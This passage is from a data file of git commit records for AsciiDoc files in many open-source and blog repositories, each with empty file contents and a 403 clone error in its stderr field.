elastic\/x-pack-elasticsearch@f36caaa371c32cd0074f91c6600107a8c9690fe4\n","repos":"GlenRSmith\/elasticsearch,uschindler\/elasticsearch,GlenRSmith\/elasticsearch,uschindler\/elasticsearch,coding0011\/elasticsearch,gingerwizard\/elasticsearch,gingerwizard\/elasticsearch,scorpionvicky\/elasticsearch,robin13\/elasticsearch,GlenRSmith\/elasticsearch,nknize\/elasticsearch,nknize\/elasticsearch,GlenRSmith\/elasticsearch,coding0011\/elasticsearch,uschindler\/elasticsearch,coding0011\/elasticsearch,uschindler\/elasticsearch,uschindler\/elasticsearch,GlenRSmith\/elasticsearch,HonzaKral\/elasticsearch,coding0011\/elasticsearch,gingerwizard\/elasticsearch,robin13\/elasticsearch,robin13\/elasticsearch,scorpionvicky\/elasticsearch,HonzaKral\/elasticsearch,gingerwizard\/elasticsearch,scorpionvicky\/elasticsearch,robin13\/elasticsearch,nknize\/elasticsearch,HonzaKral\/elasticsearch,gingerwizard\/elasticsearch,coding0011\/elasticsearch,gingerwizard\/elasticsearch,robin13\/elasticsearch,gingerwizard\/elasticsearch,gfyoung\/elasticsearch,gfyoung\/elasticsearch,gfyoung\/elasticsearch,nknize\/elasticsearch,gfyoung\/elasticsearch,scorpionvicky\/elasticsearch,nknize\/elasticsearch,HonzaKral\/elasticsearch,scorpionvicky\/elasticsearch,gfyoung\/elasticsearch","old_file":"docs\/en\/watcher\/how-watcher-works.asciidoc","new_file":"docs\/en\/watcher\/how-watcher-works.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scorpionvicky\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"d8c7635697efaf6d38501f2dbe480cf639c165c4","subject":"Update 2015-05-26-TEST.adoc","message":"Update 2015-05-26-TEST.adoc","repos":"hoernschen\/hoernschen.github.io,hoernschen\/hoernschen.github.io,hoernschen\/hoernschen.github.io,hoernschen\/hoernschen.github.io","old_file":"_posts\/2015-05-26-TEST.adoc","new_file":"_posts\/2015-05-26-TEST.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hoernschen\/hoernschen.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6d4e34a59f9e307b01c746f009f64e43c9278f24","subject":"Issue #224 Add release instructions","message":"Issue #224 Add release instructions\n","repos":"redhat-kontinuity\/catapult,redhat-kontinuity\/catapult,redhat-developer-tooling\/katapult,redhat-kontinuity\/catapult","old_file":"RELEASE.adoc","new_file":"RELEASE.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/redhat-kontinuity\/catapult.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"701408c804392d50aa5c3b2ad446e5671401b229","subject":"Update 2019-01-09-TWCTF-2017-BabyDLP-BabyRSA-3.adoc","message":"Update 2019-01-09-TWCTF-2017-BabyDLP-BabyRSA-3.adoc","repos":"cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io","old_file":"_posts\/2019-01-09-TWCTF-2017-BabyDLP-BabyRSA-3.adoc","new_file":"_posts\/2019-01-09-TWCTF-2017-BabyDLP-BabyRSA-3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cothan\/cothan.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"03b872703730a72292dac24313835c1cf273f73f","subject":"Extension registry user documentation","message":"Extension registry user documentation\n\nCo-authored-by: Guillaume Smet <guillaume.smet@gmail.com>\n\nCo-authored-by: Erin Schnabel <ebullientworks@gmail.com>\n\nCo-authored-by: George Gastaldi <94a145309f176a79f8cd943f168fb7aaebdbfc96@gmail.com>\n","repos":"quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus","old_file":"docs\/src\/main\/asciidoc\/extension-registry-user.adoc","new_file":"docs\/src\/main\/asciidoc\/extension-registry-user.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/quarkusio\/quarkus.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"02864dbc86bf4a77ee20f3e7ff15949770023774","subject":"Update 2016-09-05-A-few-left-problems.adoc","message":"Update 2016-09-05-A-few-left-problems.adoc","repos":"cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io","old_file":"_posts\/2016-09-05-A-few-left-problems.adoc","new_file":"_posts\/2016-09-05-A-few-left-problems.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cothan\/cothan.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2b3fac174db42aa7944d6e606a17d5ca1ae66715","subject":"Bootstrapping Spinnaker Deployment Services","message":"Bootstrapping Spinnaker Deployment Services\n","repos":"spinnaker\/spinnaker,riguy724\/spinnaker.github.io,duftler\/spinnaker,Roshan2017\/spinnaker,ewiseblatt\/spinnaker,Roshan2017\/spinnaker,erjohnso\/spinnaker.github.io,spinnaker\/spinnaker,tgracchus\/spinnaker,skim1420\/spinnaker,duftler\/spinnaker,duftler\/spinnaker,spinnaker\/spinnaker,Roshan2017\/spinnaker,ewiseblatt\/spinnaker,skim1420\/spinnaker,jtk54\/spinnaker,stitchfix\/spinnaker,skim1420\/spinnaker,imosquera\/spinnaker,ewiseblatt\/spinnaker,spinnaker\/spinnaker,imosquera\/spinnaker,tgracchus\/spinnaker,riguy724\/spinnaker.github.io,duftler\/spinnaker,jtk54\/spinnaker,jtk54\/spinnaker,erjohnso\/spinnaker.github.io,skim1420\/spinnaker,ewiseblatt\/spinnaker,stitchfix\/spinnaker,stitchfix\/spinnaker,imosquera\/spinnaker,tgracchus\/spinnaker","old_file":"bootstrapping-spinnaker-deployment-services.adoc","new_file":"bootstrapping-spinnaker-deployment-services.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/duftler\/spinnaker.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"039a103f11db7386594735f483e49b74fb403c76","subject":"Update 2016-08-10-How-I-installed-Go-on-my-corporate-Windows-laptop-without-administtrator-rights.adoc","message":"Update 2016-08-10-How-I-installed-Go-on-my-corporate-Windows-laptop-without-administtrator-rights.adoc","repos":"patricekrakow\/patricekrakow.github.io,patricekrakow\/patricekrakow.github.io,patricekrakow\/patricekrakow.github.io,patricekrakow\/patricekrakow.github.io","old_file":"_posts\/2016-08-10-How-I-installed-Go-on-my-corporate-Windows-laptop-without-administtrator-rights.adoc","new_file":"_posts\/2016-08-10-How-I-installed-Go-on-my-corporate-Windows-laptop-without-administtrator-rights.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/patricekrakow\/patricekrakow.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d9685c5edd7b56f6003cdd4f96fcc2a9783b0d88","subject":"updating to WildFly Swarm + MySQL sample application","message":"updating to WildFly Swarm + MySQL sample application\n","repos":"ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs","old_file":"developer-tools\/java\/chapters\/ch06-swarm.adoc","new_file":"developer-tools\/java\/chapters\/ch06-swarm.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ManoMarks\/labs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"5ad222a82a1026e2a117ed6fcff5c55bc41fa4f2","subject":"Adding Code-of-Conduct (#171)","message":"Adding Code-of-Conduct (#171)\n","repos":"redlink-gmbh\/smarti,redlink-gmbh\/smarti,redlink-gmbh\/smarti,redlink-gmbh\/smarti,redlink-gmbh\/smarti","old_file":"CODE_OF_CONDUCT.adoc","new_file":"CODE_OF_CONDUCT.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/redlink-gmbh\/smarti.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"aae430295ad1c569f61949e1b16c43c9fb7ebd1f","subject":"devdoc: added information on how to build and publish Javascript client","message":"devdoc: added information on how to build and publish Javascript client\n","repos":"canoo\/open-dolphin,janih\/open-dolphin,canoo\/open-dolphin,canoo\/open-dolphin,janih\/open-dolphin,janih\/open-dolphin,janih\/open-dolphin,canoo\/open-dolphin","old_file":"docs\/development\/src\/docs\/asciidoc\/index.adoc","new_file":"docs\/development\/src\/docs\/asciidoc\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/janih\/open-dolphin.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"514c30103584a6845f757251908756047b5bb0b1","subject":"y2b create post iPhone 4S Review","message":"y2b create post iPhone 4S Review","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-10-17-iPhone-4S-Review.adoc","new_file":"_posts\/2011-10-17-iPhone-4S-Review.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5897f1ba4548e3b083a8b2269235c4fcb6bb21b1","subject":"Update 2015-10-18-Livros-de-Prolog.adoc","message":"Update 2015-10-18-Livros-de-Prolog.adoc","repos":"minicz\/minicz.github.io,minicz\/minicz.github.io,minicz\/minicz.github.io,minicz\/minicz.github.io","old_file":"_posts\/2015-10-18-Livros-de-Prolog.adoc","new_file":"_posts\/2015-10-18-Livros-de-Prolog.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/minicz\/minicz.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"310bae5000ec4d648094e1728170bb8a3ecae072","subject":"Update 2017-07-18-Makes-You-Wonder.adoc","message":"Update 2017-07-18-Makes-You-Wonder.adoc","repos":"mcornell\/OFM,mcornell\/OFM,mcornell\/OFM,mcornell\/OFM","old_file":"_posts\/2017-07-18-Makes-You-Wonder.adoc","new_file":"_posts\/2017-07-18-Makes-You-Wonder.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mcornell\/OFM.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fd30740dc51adf60620930fcc3a3c977e7d06444","subject":"Update 2019-01-31-My-English-Title.adoc","message":"Update 2019-01-31-My-English-Title.adoc","repos":"ntfnd\/ntfnd.github.io,ntfnd\/ntfnd.github.io,ntfnd\/ntfnd.github.io,ntfnd\/ntfnd.github.io","old_file":"_posts\/2019-01-31-My-English-Title.adoc","new_file":"_posts\/2019-01-31-My-English-Title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ntfnd\/ntfnd.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"99c90d587f438b2c70484474d7d1987903b8cff7","subject":"Update 2016-11-16-iOS-Team-Provisioning-Profile.adoc","message":"Update 2016-11-16-iOS-Team-Provisioning-Profile.adoc","repos":"aspick\/hubpress.io,aspick\/hubpress.io,aspick\/hubpress.io,aspick\/hubpress.io","old_file":"_posts\/2016-11-16-iOS-Team-Provisioning-Profile.adoc","new_file":"_posts\/2016-11-16-iOS-Team-Provisioning-Profile.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/aspick\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6c6871bdf9aa3f0a38599e63e2f5cb0532fdbff5","subject":"Update 2016-08-03-Hello.adoc","message":"Update 2016-08-03-Hello.adoc","repos":"ekroon\/ekroon.github.io,ekroon\/ekroon.github.io,ekroon\/ekroon.github.io","old_file":"_posts\/2016-08-03-Hello.adoc","new_file":"_posts\/2016-08-03-Hello.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ekroon\/ekroon.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5ce713b799222ee8d109c78281935edea434a50c","subject":"Update 2017-05-03-Intro.adoc","message":"Update 2017-05-03-Intro.adoc","repos":"kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io","old_file":"_posts\/2017-05-03-Intro.adoc","new_file":"_posts\/2017-05-03-Intro.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kunicmarko20\/kunicmarko20.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3d756d7df09a8b9aeae99c61ac2239beb9dc2d51","subject":"Attempt link bug workaround","message":"Attempt link bug workaround\n","repos":"oliviercailloux\/java-course,oliviercailloux\/java-course,oliviercailloux\/jee","old_file":"Best practices\/Local design.adoc","new_file":"Best practices\/Local design.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/jee.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"76a697d2c853e641a9b4c746e49a8bedd0cbdefe","subject":"Update 2017-05-11-Development-Environment.adoc","message":"Update 2017-05-11-Development-Environment.adoc","repos":"ioisup\/ioisup.github.io,ioisup\/ioisup.github.io,ioisup\/ioisup.github.io,ioisup\/ioisup.github.io","old_file":"_posts\/2017-05-11-Development-Environment.adoc","new_file":"_posts\/2017-05-11-Development-Environment.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ioisup\/ioisup.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8ad74253058e64163e53104d9ea574c41978dca0","subject":"Update 2017-05-24-Welcome.adoc","message":"Update 2017-05-24-Welcome.adoc","repos":"siliconhbo\/siliconhbo.github.io,siliconhbo\/siliconhbo.github.io,siliconhbo\/siliconhbo.github.io,siliconhbo\/siliconhbo.github.io","old_file":"_posts\/2017-05-24-Welcome.adoc","new_file":"_posts\/2017-05-24-Welcome.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/siliconhbo\/siliconhbo.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a20b3db26cb33fc533f531a3b2f9f520d01ff569","subject":"Update 2015-07-29-Hibernate.adoc","message":"Update 2015-07-29-Hibernate.adoc","repos":"jmnarloch\/blog.io,jmnarloch\/blog.io,jmnarloch\/blog.io","old_file":"_posts\/2015-07-29-Hibernate.adoc","new_file":"_posts\/2015-07-29-Hibernate.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jmnarloch\/blog.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"938b6f29f97ca924e17ac9a1790d57f6729a15e3","subject":"Update 2016-12-22-Larastudy.adoc","message":"Update 2016-12-22-Larastudy.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-12-22-Larastudy.adoc","new_file":"_posts\/2016-12-22-Larastudy.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"46be46e64b94b94d4fec81964deae3e458420734","subject":"y2b create post Samsung Galaxy Tab 10.1 Unboxing","message":"y2b create post Samsung Galaxy Tab 10.1 Unboxing","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-07-04-Samsung-Galaxy-Tab-101-Unboxing.adoc","new_file":"_posts\/2011-07-04-Samsung-Galaxy-Tab-101-Unboxing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d16b245c8a8396ff2e6ca6861ee57a9168ca15da","subject":"Update 2015-06-05-Es-ist-die-Donutwelt.adoc","message":"Update 2015-06-05-Es-ist-die-Donutwelt.adoc","repos":"TheGertproject\/TheGertproject.github.io,TheGertproject\/TheGertproject.github.io,TheGertproject\/TheGertproject.github.io","old_file":"_posts\/2015-06-05-Es-ist-die-Donutwelt.adoc","new_file":"_posts\/2015-06-05-Es-ist-die-Donutwelt.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/TheGertproject\/TheGertproject.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"30c43f7390939686aefc9d4f7259e4b59a0627c0","subject":"Update 2015-10-10-Space-Quest.adoc","message":"Update 2015-10-10-Space-Quest.adoc","repos":"manelvf\/blog,manelvf\/blog,manelvf\/blog,manelvf\/blog","old_file":"_posts\/2015-10-10-Space-Quest.adoc","new_file":"_posts\/2015-10-10-Space-Quest.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/manelvf\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ff842a2ab29098adba4c327807d52dab1694c0fb","subject":"Added mathjax information to ipython_post_setup.","message":"Added mathjax information to ipython_post_setup.\n","repos":"lowcloudnine\/singularity-spark,lowcloudnine\/singularity-spark","old_file":"docs\/ipython_post_setup.adoc","new_file":"docs\/ipython_post_setup.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lowcloudnine\/singularity-spark.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"85aee2ec58e167b77ae17d36c4649bc625ca2b45","subject":"Update 2015-09-20-Python-re-module.adoc","message":"Update 2015-09-20-Python-re-module.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2015-09-20-Python-re-module.adoc","new_file":"_posts\/2015-09-20-Python-re-module.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d90ffd3a57f84df71c796d1be5190726f9027499","subject":"Update 2017-05-24-Episode-100-Szas.adoc","message":"Update 2017-05-24-Episode-100-Szas.adoc","repos":"blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io","old_file":"_posts\/2017-05-24-Episode-100-Szas.adoc","new_file":"_posts\/2017-05-24-Episode-100-Szas.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/blahcadepodcast\/blahcadepodcast.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"aa1b924b1d3adea58593ec7c4a7f34a4c0173c20","subject":"Delete the file at '_posts\/2019-01-31-My-English-Title.adoc'","message":"Delete the file at '_posts\/2019-01-31-My-English-Title.adoc'","repos":"akhmetgali\/hubpress.io,akhmetgali\/hubpress.io,akhmetgali\/hubpress.io,akhmetgali\/hubpress.io","old_file":"_posts\/2019-01-31-My-English-Title.adoc","new_file":"_posts\/2019-01-31-My-English-Title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/akhmetgali\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2e2e8cb5585aa2eee706f0f09beb962524bd7193","subject":"Update 2017-08-14-Cloud-Spanner.adoc","message":"Update 2017-08-14-Cloud-Spanner.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-08-14-Cloud-Spanner.adoc","new_file":"_posts\/2017-08-14-Cloud-Spanner.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"09e5863c86710b2a9956579c956481a8975b2df5","subject":"May Release (#402)","message":"May Release (#402)\n\nMay release post","repos":"clojure\/clojurescript-site","old_file":"content\/news\/2022-05-13-release.adoc","new_file":"content\/news\/2022-05-13-release.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojurescript-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"036668ce37a52acdd425e231fad881f55bbc4a92","subject":"Update 2016-04-28-Word-Press-1.adoc","message":"Update 2016-04-28-Word-Press-1.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-04-28-Word-Press-1.adoc","new_file":"_posts\/2016-04-28-Word-Press-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"49a21617dac70771648e3422a12c9458030e35f7","subject":"Update 2016-11-3-you-know-what.adoc","message":"Update 2016-11-3-you-know-what.adoc","repos":"fauzanooor\/fauzanooor.github.io,fauzanooor\/fauzanooor.github.io,fauzanooor\/fauzanooor.github.io,fauzanooor\/fauzanooor.github.io","old_file":"_posts\/2016-11-3-you-know-what.adoc","new_file":"_posts\/2016-11-3-you-know-what.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fauzanooor\/fauzanooor.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a5b02e0e1b4f5b4eb0fc3672b8eecc86fb7c8ce0","subject":"Adding API document","message":"Adding API document\n","repos":"vaadin\/angular2-polymer,vaadin\/angular2-polymer,platosha\/angular-polymer,platosha\/angular-polymer,platosha\/angular-polymer","old_file":"docs\/api.adoc","new_file":"docs\/api.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/vaadin\/angular2-polymer.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b9a8a4de4e6ff8df66be49127ce681abce79a1b4","subject":"updating Docker version","message":"updating Docker version\n","repos":"ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs","old_file":"developer-tools\/java\/chapters\/ch02-basic-concepts.adoc","new_file":"developer-tools\/java\/chapters\/ch02-basic-concepts.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ManoMarks\/labs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c2a3f34ea3c85c29b8b595ea540aec42e41258bb","subject":"job #11937 - Implementation note","message":"job #11937 - Implementation note\n\nNote that this note was created in a separate branch from the work.\n","repos":"rmulvey\/bridgepoint,rmulvey\/bridgepoint,travislondon\/bridgepoint,leviathan747\/bridgepoint,rmulvey\/bridgepoint,keithbrown\/bridgepoint,travislondon\/bridgepoint,leviathan747\/bridgepoint,leviathan747\/bridgepoint,keithbrown\/bridgepoint,lwriemen\/bridgepoint,travislondon\/bridgepoint,keithbrown\/bridgepoint,xtuml\/bridgepoint,xtuml\/bridgepoint,xtuml\/bridgepoint,leviathan747\/bridgepoint,lwriemen\/bridgepoint,lwriemen\/bridgepoint,rmulvey\/bridgepoint,lwriemen\/bridgepoint,cortlandstarrett\/bridgepoint,cortlandstarrett\/bridgepoint,lwriemen\/bridgepoint,lwriemen\/bridgepoint,lwriemen\/bridgepoint,keithbrown\/bridgepoint,keithbrown\/bridgepoint,leviathan747\/bridgepoint,keithbrown\/bridgepoint,cortlandstarrett\/bridgepoint,xtuml\/bridgepoint,cortlandstarrett\/bridgepoint,travislondon\/bridgepoint,travislondon\/bridgepoint,xtuml\/bridgepoint,travislondon\/bridgepoint,cortlandstarrett\/bridgepoint,leviathan747\/bridgepoint,rmulvey\/bridgepoint,cortlandstarrett\/bridgepoint,travislondon\/bridgepoint,rmulvey\/bridgepoint,rmulvey\/bridgepoint,xtuml\/bridgepoint,lwriemen\/bridgepoint,cortlandstarrett\/bridgepoint,xtuml\/bridgepoint,cortlandstarrett\/bridgepoint,travislondon\/bridgepoint,leviathan747\/bridgepoint,keithbrown\/bridgepoint,leviathan747\/bridgepoint,xtuml\/bridgepoint","old_file":"doc-bridgepoint\/notes\/11937_epoch\/11937_epoch_int.adoc","new_file":"doc-bridgepoint\/notes\/11937_epoch\/11937_epoch_int.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xtuml\/bridgepoint.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b5f5665ea638a5a4d53b584defef2557a9353a85","subject":"SEC-2463: CSRF documentation includes EnableWebMvcSecurity","message":"SEC-2463: CSRF documentation includes EnableWebMvcSecurity\n","repos":"Krasnyanskiy\/spring-security,yinhe402\/spring-security,SanjayUser\/SpringSecurityPro,zshift\/spring-security,driftman\/spring-security,tekul\/spring-security,xingguang2013\/spring-security,forestqqqq\/spring-security,vitorgv\/spring-security,olezhuravlev\/spring-security,vitorgv\/spring-security,mrkingybc\/spring-security,jmnarloch\/spring-security,rwinch\/spring-security,mounb\/spring-security,jgrandja\/spring-security,diegofernandes\/spring-security,caiwenshu\/spring-security,mounb\/spring-security,jmnarloch\/spring-security,diegofernandes\/spring-security,Krasnyanskiy\/spring-security,zhaoqin102\/spring-security,pwheel\/spring-security,kazuki43zoo\/spring-security,hippostar\/spring-security,forestqqqq\/spring-security,jgrandja\/spring-security,yinhe402\/spring-security,SanjayUser\/SpringSecurityPro,olezhuravlev\/spring-security,cyratech\/spring-security,xingguang2013\/spring-security,mounb\/spring-security,zgscwjm\/spring-security,Krasnyanskiy\/spring-security,pkdevbox\/spring-security,wkorando\/spring-security,cyratech\/spring-security,liuguohua\/spring-security,forestqqqq\/spring-security,hippostar\/spring-security,kazuki43zoo\/spring-security,mparaz\/spring-security,panchenko\/spring-security,liuguohua\/spring-security,zhaoqin102\/spring-security,mparaz\/spring-security,ractive\/spring-security,vitorgv\/spring-security,rwinch\/spring-security,eddumelendez\/spring-security,zhaoqin102\/spring-security,diegofernandes\/spring-security,fhanik\/spring-security,follow99\/spring-security,izeye\/spring-security,cyratech\/spring-security,Xcorpio\/spring-security,olezhuravlev\/spring-security,MatthiasWinzeler\/spring-security,thomasdarimont\/spring-security,Xcorpio\/spring-security,thomasdarimont\/spring-security,wilkinsona\/spring-security,Peter32\/spring-security,eddumelendez\/spring-security,xingguang2013\/spring-security,wkorando\/spring-security,SanjayUser\/SpringSecurityPro,ractive\/spring-security,ollie314\/spring-security,fhanik\/spring-security,zshift\/spring-security,driftman\/spring-security,zgscwjm\/spring-security,liuguohua\/spring-security,panchenko\/spring-security,MatthiasWinzeler\/spring-security,wilkinsona\/spring-security,rwinch\/spring-security,spring-projects\/spring-security,thomasdarimont\/spring-security,kazuki43zoo\/spring-security,zhaoqin102\/spring-security,eddumelendez\/spring-security,ractive\/spring-security,cyratech\/spring-security,raindev\/spring-security,caiwenshu\/spring-security,mparaz\/spring-security,djechelon\/spring-security,jmnarloch\/spring-security,tekul\/spring-security,yinhe402\/spring-security,tekul\/spring-security,driftman\/spring-security,izeye\/spring-security,follow99\/spring-security,forestqqqq\/spring-security,mdeinum\/spring-security,panchenko\/spring-security,wkorando\/spring-security,djechelon\/spring-security,chinazhaoht\/spring-security,Krasnyanskiy\/spring-security,jgrandja\/spring-security,follow99\/spring-security,chinazhaoht\/spring-security,zgscwjm\/spring-security,olezhuravlev\/spring-security,kazuki43zoo\/spring-security,Peter32\/spring-security,adairtaosy\/spring-security,likaiwalkman\/spring-security,likaiwalkman\/spring-security,spring-projects\/spring-security,spring-projects\/spring-security,Peter32\/spring-security,zshift\/spring-security,hippostar\/spring-security,raindev\/spring-security,vitorgv\/spring-security,rwinch\/spring-security,follow99\/spring-security,SanjayUser\/SpringSecurityPro,fhanik\/spring-security,djechelon\/spring-security,caiwenshu\/spring-security,mdeinum\/spring-security,thomasdarimont\/spring-security,MatthiasWinzeler\/spring-security,djechelon\/spring-security,ollie314\/spring-security,fhanik\/spring-security,spring-projects\/spring-security,ollie314\/spring-security,mde